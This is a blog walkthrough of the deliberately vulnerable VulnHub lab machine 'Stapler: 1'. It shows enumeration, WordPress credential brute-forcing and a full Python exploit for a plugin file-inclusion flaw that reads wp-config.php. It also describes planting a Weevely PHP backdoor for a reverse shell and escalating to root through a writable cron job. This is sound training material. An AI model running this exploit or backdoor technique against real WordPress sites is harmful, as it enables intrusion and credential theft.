VulnHub – Stapler: 1 Walkthrough

May 1, 2021 | by Stefano Lanaro | 4 Comments

Introduction

This was an easy Linux machine that involved exploiting a WordPress plugin to gain access to the wp-config.php file which contained database credentials and uploading a malicious plugin into WordPress to gain remote access. Privilege escalation was then possible by exploiting a clear-text password left in the BASH history or an insecure cron job.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, and using the following flags:

-sC to run default scripts
-sV to enumerate applications versions
-oA to save the output in all formats available

The scan has revealed port 21, 22, 53, 80, 139, 666 and 3306, so the next logical step would be to start enumerating HTTP, FTP, SMB and MySQL.

When performing a subsequent Nmap scan using the -p- flag to scan all ports which has revealed a new port (12380):

Enumerating FTP

It appears anonymous authentication is enabled on the box,

The note contains the following:

Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.

For the time being it would be best not to spend more time investigating this service…

Enumerating SMB

Using the SMBclient tool to enumerate open shares:

When using the Enum4Linux tool against the target machine, it managed to identify a number of users:


 ===================================================================== 
|    Users on 10.0.0.101 via RID cycling (RIDS: 500-550,1000-1050)    |
 ===================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-864226560-67800430-3082388513
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

These could be used later on for a brute-forcing attack.

Enumerating DNS

Using the NsLookup tool to identify any domain name records:

Performing a DNS zone transfer to identify potential domain names:

Both of these tests were unsuccessful unfortunately.

Enumerating Doom

When connecting to the Doom service on port 666, it returns mangled data:

When redirecting the data to a file and using the file command to inspect it, it appears to be ZIP archive. Unzipping the archive:

The archive contained an image, which seems to contain a segmentation fault error, which could indicate a buffer overflow vulnerability:

When using the strings command against the image, an interesting message is revealed:

Enumerating HTTP

When navigating to port 80 on a browser, the following page comes up:

The following site is hosted on port 12380, which looks a little more interesting:

When performing a Nikto scan against the target, it has found an /admin112233, a /blogblog and a /phpmyadmin entry:

The /admin112233 entry seems to just display a Javascript alert, so it won’t be useful at this point in time:

The /phpmyadmin entry takes to a PHPMyAdmin login screen, which could be useful later on to retrieve credentials:

The /blogblog entry takes to a blog:

When looking at the source code, it appears that the blog is powered by WordPress:

Enumerating WordPress

When running WPScan against the target machine with the following flags, a few users are found:

–url to specify the URL for the Wordrpess application, in this case http://10.0.0.101:12380/blogblog/
–enumerate to specify the elements to enumerate, in this case u for users
–disable-tls-checks – to ignore unsigned SSL/TLS certificates

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[32m[+][0m URL: https://10.0.0.101:12380/blogblog/ [10.0.0.101]
[32m[+][0m Started: Sat May 16 13:25:13 2020

[34m[i][0m User(s) Identified:

[32m[+][0m John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[32m[+][0m john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[32m[+][0m tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Using WPScan again to perform a brute-force attack using the following flags:

–disable-tls-checks – to ignore unsigned SSL/TLS certificates
-P to specify the wordlist to be used for the brute-force attack, in this case, the top 1000 passwordsllist
-o to specify the file to output the results of the scan to
-t to specify the number of threads, in this case, 50
–url to specify the URL for the Wordrpess application, in this case, http://10.0.0.101:12380/blogblog/

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
17/39
[32m[+][0m URL: https://10.0.0.101:12380/blogblog/ [10.0.0.101]
[32m[+][0m Started: Sat May 16 14:09:13 2020
[31m[!][0m Valid Combinations Found:
| Username: garry, Password: football
| Username: harry, Password: monkey
| Username: scott, Password: cookie
| Username: tim, Password: thumb

The scan has fond valid credentials for a few of the users identified earlier.

After logging in with each one of them, none seemed to have WordPress admin access, so this seems to be a dead end:

Also tried to brute-force SSH and FTP credentials using these users to no avail.

Using WPScan with the following flags to enumerate plugins on the WordPress site:

–disable-tls-checks – to ignore unsigned SSL/TLS certificates
–enumerate to specify the elements to enumerate, in this case, ap for all plugins
–plugins-detection to specify the mode to use when attempting to enumerate plugins, in this case, aggressive
–url to specify the URL for the Wordrpess application, in this case, http://10.0.0.101:12380/blogblog
-o to specify the file to output the results of the scan to

The scan has identified quite a few plugins:

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[32m[+][0m URL: https://10.0.0.101:12380/blogblog/ [10.0.0.101]
[32m[+][0m Started: Sat May 16 14:27:39 2020

[34m[i][0m Plugin(s) Identified:

[32m[+][0m advanced-video-embed-embed-videos-or-playlists
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-10-14T13:52:00.000Z
 | Readme: https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
 | [31m[!][0m Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
 |
 | Version: 1.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt

[32m[+][0m akismet
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/akismet/
 | Latest Version: 4.1.5
 | Last Updated: 2020-04-29T13:02:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/akismet/, status: 403
 |
 | The version could not be determined.

[32m[+][0m shortcode-ui
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/
 | Last Updated: 2019-01-16T22:56:00.000Z
 | Readme: https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
 | [33m[!][0m The version is out of date, the latest version is 0.7.4
 | [31m[!][0m Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
 |
 | Version: 0.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt

[32m[+][0m two-factor
 | Location: https://10.0.0.101:12380/blogblog/wp-content/plugins/two-factor/
 | Latest Version: 0.6.0
 | Last Updated: 2020-05-06T19:56:00.000Z
 | Readme: https://10.0.0.101:12380/blogblog/wp-content/plugins/two-factor/readme.txt
 | [31m[!][0m Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - https://10.0.0.101:12380/blogblog/wp-content/plugins/two-factor/, status: 200
 |
 | The version could not be determined.

Using SearchSploit to look for known vulnerabilities in each of the discovered plugins:

It appears the Advanced Video plugin is affected by a local file inclusion vulnerability.

Exploiting File Inclusion Vulnerability:

This plugin allows us to download the content of the

Looking at the exploit, it appears that the ave_publishPost function (specifically the thumb) parameter allows attackers to include arbitrary files hosted on the webserver. The exploit can be used to access the wp-config.php file which contains the WordPress configuration as well as credentials to access the database.

#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / WordPress 4.2.2

# Vulnerable Code (/inc/classes/class.avePost.php) Line 57:

#  function ave_publishPost(){
#    $title = $_REQUEST['title'];
#    $term = $_REQUEST['term'];
#    $thumb = $_REQUEST['thumb'];
# <snip>
# Line 78:
#    $image_data = file_get_contents($thumb);


# POC - http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]

# Exploit - Print the content of wp-config.php in terminal (default WordPress config)

import random
import urllib2
import re

url = "http://127.0.0.1/wordpress" # insert url to wordpress

randomID = long(random.random() * 100000000000000000L)

objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content =  objHtml.readlines()
for line in content:
	numbers = re.findall(r'\d+',line)
	id = numbers[-1]
	id = int(id) / 10

objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()

for line in content:
	if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
		urls=re.findall('"(https?://.*?)"', line)
		print urllib2.urlopen(urls[0]).read()

Running the exploit initially fails as the site is using HTTPS and no valid SSL certificate is provided:

Found a solution to this error at this Stack Overflow post, therefore adding the following lines to the exploit:

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

After running the exploit, it has now generated an image with the contents of the wp-config.php file

Using Curl the image and save it locally:

When viewing the contents of the image file, it contains database credentials:

Used the credentials to successfully log into PHPMyAdmin:

Exploiting WordPress Plugin Functionality

Running the following query to obtain information about WordPress admin users:

Using the hashes.org online hash lookup tool to find out the password for the Mike user:

This use appears to have admin access to the WordPress site:

Navigating to Plugins–>Add New:

Weevely is a stealth PHP web shell that simulate a telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. Using Weevely to generate a PHP reverse shell providing a password and the name for the shell:

The backdoor.php file has been successfully uploaded:

Using Weevely to gain a reverse shell, providing the path to the file and the password used earlier:

This has granted a reverse shell as the www-data user.

Privilege Escalation #1

When inspecting the bash history for the JKanode user it, it seems to contain SSH credentials for the JKanode and peter users, used with the SSHPass tool:

After logging in as JKanode, it appears this user does not have root access:

Changing user to peter using the su command:

It appears this user does have root access, reading the fllag::

Privilege Escalation #2

When reviewing cron jobs, it appears logrotate is executed by root and can be edited by all users:

Modified the file to create a SUID copy of the /bin/dash binary:

The following command can then be used to execute it and gain root access:

/bin/dash -p
#whoami
root

Conclusion

This was a very interesting box, as it had several ways to gain a foothold and to escalate privileges, exploiting various vulnerabilities and/or misconfigurations. The steps above are not an exhaustive list of the techniques that can be used to gain access but it is only the path I went down as I completed the machine.

4 comments

Comments are closed.

police.bet

May 16, 2021 at 3:13 pm

Hi, i read your blog occasionally and i own a
similar one and i was just wondering if you get a lot of spam comments?

If so how do you reduce it, any plugin or anything you can recommend?

I get so much lately it’s driving me insane so any help is very much appreciated.
- Stefano Lanaro
  
  May 19, 2021 at 7:52 am
  
  Hey mate. I have also been getting a few spam comments, but in my WordPress site comments have to be approved first, so I simply mark them as spam 🙂
Hairstyles Vip

May 9, 2021 at 3:07 am

Thanks so much for giving everyone such a nice opportunity to read from this website. It is often very pleasurable and as well , packed with a great time for me personally and my office acquaintances to search your web site at the least thrice weekly to read through the fresh secrets you have got. And indeed, I’m so at all times pleased with all the great information you give. Certain two tips on this page are unequivocally the most suitable I’ve ever had.
- Stefano Lanaro
  
  May 9, 2021 at 6:07 am
  
  Thanks!